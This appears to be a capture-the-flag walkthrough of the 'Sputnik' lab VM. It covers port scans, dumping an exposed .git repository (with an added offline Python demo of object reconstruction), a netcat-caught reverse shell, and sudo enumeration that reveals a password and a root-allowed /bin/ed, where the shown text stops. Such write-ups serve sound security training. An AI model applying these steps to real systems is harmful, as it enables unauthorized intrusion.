```
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:40 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
8089/tcp  open  unknown
55555/tcp open  unknown
61337/tcp open  unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
```
```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p8089,55555,61337 192.168.56.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:41 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00055s latency).

PORT      STATE SERVICE  VERSION
8089/tcp  open  ssl/http Splunkd httpd
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after:  2022-03-28T11:03:21
| http-robots.txt: 1 disallowed entry
|_/
55555/tcp open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Flappy Bird Game
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-git:
|   192.168.56.130:55555/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
61337/tcp open  http     Splunkd httpd
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://192.168.56.130:61337/en-US/account/login?return_to=%2Fen-US%2F
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.70 seconds
```
Every open port serves a web application, and port 55555 additionally exposes its .git directory (flagged by the http-git script).
```
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p8089,55555,61337 192.168.56.130
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:59 EDT
Nmap scan report for 192.168.56.130
Host is up (0.00075s latency).

PORT      STATE SERVICE
8089/tcp  open  unknown
55555/tcp open  unknown
61337/tcp open  unknown
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 45.10 seconds
```
The vuln script scan turned up nothing.
.git leak
A quick look at each web interface: port 55555 hosts a small game; 8089 is the Splunkd management interface, but both the service and serviceNS endpoints require a login; 61337 also requires a login and looks like the real backend login page.
```
┌──(kali㉿kali)-[~/Downloads/Sputnik/GitTools/Dumper]
└─$ ./gitdumper.sh http://192.168.56.130:55555/.git/ clone
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
```
```
┌──(kali㉿kali)-[~/…/GitTools/Dumper/clone/_sheet.png.extracted]
└─$ git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717
error: unable to read sha1 file of secret (f4385198ce1cab56e0b2a1c55e8863040045b085)
error: invalid object 100644 f4385198ce1cab56e0b2a1c55e8863040045b085 for 'secret'
D       secret
Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c <new-branch-name>

Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false
```
```
┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy]
└─$ git checkout 07fda135aae22fa7869b3de9e450ff7cacfbc717
Note: switching to '07fda135aae22fa7869b3de9e450ff7cacfbc717'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c <new-branch-name>

Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 07fda13 Commit new file
```

```
┌──(kali㉿kali)-[~/Downloads/Sputnik/flappy]
└─$ ls -liah
total 52K
1183470 drwxr-xr-x 3 kali kali 4.0K Jul 18 11:04 .
1183326 drwxr-xr-x 5 kali kali 4.0K Jul 18 11:04 ..
1183471 drwxr-xr-x 8 kali kali 4.0K Jul 18 11:04 .git
1183785 -rw-r--r-- 1 kali kali  378 Jul 18 11:04 .gitattributes
1183800 -rw-r--r-- 1 kali kali  649 Jul 18 11:04 .gitignore
1183802 -rw-r--r-- 1 kali kali 7.5K Jul 18 11:04 index.html
1183801 -rw-r--r-- 1 kali kali   26 Jul 18 11:04 README.md
1183806 -rw-r--r-- 1 kali kali   42 Jul 18 11:04 secret
1183803 -rw-r--r-- 1 kali kali  12K Jul 18 11:04 sheet.png
1183804 -rw-r--r-- 1 kali kali 2.1K Jul 18 11:04 sprite.js
```
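GitDumper recovers a repository by fetching HEAD and then every object that the commit, tree and blob chain references out of .git/objects/. The following is an added example written for this writeup, not code from GitTools or from the target, that reproduces that walk offline against a constructed object store (a dict standing in for the HTTP fetches). The names make_loose_object, parse_loose_object, parse_commit, parse_tree, walk_commit and build_sample_store are chosen here, and the sample repository contents are made up. It verifies every object against its own SHA-1 before trusting it, and when an object is absent it records the hole and carries on, which is the situation the first checkout above ran into with the secret blob.

```python
import hashlib
import zlib

def make_loose_object(obj_type, payload):
    """Build a git loose object; returns (hex sha1, zlib-compressed bytes)."""
    raw = obj_type.encode() + b" " + str(len(payload)).encode() + b"\x00" + payload
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)

def parse_loose_object(data, expected_sha=None):
    """Inflate a loose object and split off its '<type> <len>\\0' header.
    With expected_sha, reject objects that do not hash to their own name
    (a truncated or tampered download) instead of silently keeping them."""
    raw = zlib.decompress(data)
    header, _, payload = raw.partition(b"\x00")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(payload):
        raise ValueError("object length mismatch")
    if expected_sha is not None and hashlib.sha1(raw).hexdigest() != expected_sha:
        raise ValueError("object hash mismatch")
    return obj_type, payload

def parse_commit(payload):
    """Return (tree sha, [parent shas]) from a commit body."""
    tree, parents = None, []
    for line in payload.split(b"\n"):
        if line == b"":
            break  # blank line ends the headers; the message follows
        key, _, value = line.partition(b" ")
        if key == b"tree":
            tree = value.decode()
        elif key == b"parent":
            parents.append(value.decode())
    return tree, parents

def parse_tree(payload):
    """Return [(mode, name, hex sha)]; entries are '<mode> <name>\\0<20-byte sha>'."""
    entries, pos = [], 0
    while pos < len(payload):
        nul = payload.index(b"\x00", pos)
        mode, name = payload[pos:nul].decode().split(" ", 1)
        entries.append((mode, name, payload[nul + 1:nul + 21].hex()))
        pos = nul + 21
    return entries

def walk_commit(store, commit_sha):
    """Reconstruct one commit's files. store maps hex sha -> compressed object and
    stands in for GETs of .git/objects/xx/yyyy... Returns (files, missing): files
    maps path -> blob bytes; missing collects object ids the store lacked, so a
    partial dump still yields what is recoverable instead of aborting."""
    files, missing = {}, set()

    def fetch(sha):
        if sha not in store:
            missing.add(sha)
            return None
        return parse_loose_object(store[sha], expected_sha=sha)

    def walk_tree(sha, prefix):
        tree = fetch(sha)
        if tree is None:
            return
        for mode, name, child in parse_tree(tree[1]):
            if mode == "40000":  # subdirectory: recurse
                walk_tree(child, prefix + name + "/")
            else:
                blob = fetch(child)
                if blob is not None:
                    files[prefix + name] = blob[1]

    commit = fetch(commit_sha)
    if commit is not None:
        tree_sha, _parents = parse_commit(commit[1])
        walk_tree(tree_sha, "")
    return files, missing

def build_sample_store():
    """Constructed stand-in for the leaked repo: one commit with README.md and secret."""
    store = {}

    def put(obj_type, payload):
        sha, data = make_loose_object(obj_type, payload)
        store[sha] = data
        return sha

    secret_sha = put("blob", b"constructed-secret-value\n")
    readme_sha = put("blob", b"# flappy\n")
    tree_payload = b""
    for name, sha in sorted([("README.md", readme_sha), ("secret", secret_sha)]):
        tree_payload += b"100644 " + name.encode() + b"\x00" + bytes.fromhex(sha)
    tree_sha = put("tree", tree_payload)
    commit_sha = put("commit", b"tree " + tree_sha.encode() + b"\n"
                     + b"author a <a@example.invalid> 0 +0000\n"
                     + b"committer a <a@example.invalid> 0 +0000\n"
                     + b"\nCommit new file\n")
    return store, commit_sha, secret_sha

if __name__ == "__main__":
    store, head, secret = build_sample_store()
    print(walk_commit(store, head))  # both files recovered
    del store[secret]                # simulate a blob the dump never received
    print(walk_commit(store, head))  # README.md only; secret's id reported as missing
```

Against a live target the dict lookup becomes a GET of .git/objects/<sha[:2]>/<sha[2:]>, starting from the commit id in .git/HEAD or .git/refs/heads/*. Objects that exist only inside a packfile under .git/objects/pack/ are not loose and this walk will report them as missing; those need the pack and its index fetched separately.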
```
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 444
[sudo] password for kali:
listening on [any] 444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.130] 52604
splunk@sputnik:/$ whoami
whoami
splunk
splunk@sputnik:/$ id
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
splunk@sputnik:/$ uname -a
uname -a
Linux sputnik 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
splunk@sputnik:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s17: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:d8:0b:51 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.130/24 brd 192.168.56.255 scope global dynamic enp0s17
       valid_lft 600sec preferred_lft 600sec
    inet6 fe80::a00:27ff:fed8:b51/64 scope link
       valid_lft forever preferred_lft forever
```
Privilege escalation
Success. Next, check what sudo -l allows.
```
splunk@sputnik:/$ sudo -l
sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_job

Matching Defaults entries for splunk on sputnik:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User splunk may run the following commands on sputnik:
    (root) /bin/ed
```